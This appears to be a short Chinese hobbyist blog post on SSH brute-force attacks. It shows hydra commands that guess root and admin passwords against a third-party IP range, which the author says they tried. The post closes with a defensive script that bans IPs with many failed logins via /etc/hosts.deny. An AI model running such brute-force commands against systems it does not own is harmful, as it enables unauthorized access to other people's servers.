你们应该看到我下图服务器被攻击的提示,今天就来说说如何攻击,我们又该如何防护:
前两次攻击是我自己攻击自己
剩下那些ip攻击,就属于恶意攻击。防人之心不可无。
先说说攻击模式如果你是Ubuntu系统直接就可以安装:
apt install hydra
就拿上面那些攻击我服务器ip来说吧(这里我不是恶意攻击只是举例):
首先我说过攻击服务器前篇你必须知道人家的ip地址+端口
ip:这块检测我还没想到怎么做
端口,攻击服务器前篇我说过了如图:
这个国外的服务器,开了3个端口,22,21,80
剩下就是攻击了,我尝试过用22端口对其暴力破解。
$hydra -l root -P 机房字典.txt -t 1 -vV -e ns 168.196.148.* ssh
给我的
我发现这个孩子是不是限制ip白名单,要fuck,不行我想是不是换端口搞他,我又切换端口21和用户 :
hydra -l admin -P 机房字典.txt -s 21 -t 1 -vV -e ns 168.196.148.* ssh
image.png
这搞得我怀疑人生,防护这么好,我太菜。。。。
image.png
其实hydra破解很强大,基本上包含了所有http协议
下面说说菜鸡防护介绍:
先查看异常登录次数:
cat /var/log/secure | awk '/Failed/{print $(NF-3)}' | sort -n| uniq -c| sort -rn
异常登录次数
加个脚本,我真实测试过报错和上面那个孩子服务器一样,限制ip访问了:
LogPath=/var/log/secure
LimitLine=20 #根据需求而定
[ ! -f $LogPath ] && { echo "Warning:$LogPath is not exist!" ; exit 1;}
for i in `cat $LogPath | awk '/Failed/{print $(NF-3)}' | sort -n| uniq -c| sort -rn| awk '{print $1":"$2}'`
do
NUM=`echo $i | awk -F: '{print $1}'`
IP=`echo $i | awk -F: '{print $2}'`
if [ $NUM -gt $LimitLine ];then
grep $IP /etc/hosts.deny > /dev/null
if [ $? -gt 0 ];then
echo sshd:$IP >> /etc/hosts.deny
fi
fi
done
查看限制ip有哪些;
$ cat /etc/hosts.deny
可以看到限制ip登录了
成功让我自己不能访问了
